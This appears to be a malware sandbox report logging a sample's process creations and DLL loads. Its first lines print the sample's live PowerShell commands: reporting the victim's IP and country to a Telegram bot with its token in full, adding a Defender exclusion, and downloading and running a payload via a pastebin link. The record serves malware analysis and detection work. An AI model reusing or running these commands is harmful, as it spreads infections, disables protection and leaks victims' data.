Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\mxtvcgq32fe.exe "C:\Windows\Temp\mxtvcgq32fe.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"	Jump to behavior
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: version.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: wldp.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: amsi.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: userenv.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: profapi.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: msasn1.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: gpapi.dll
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll
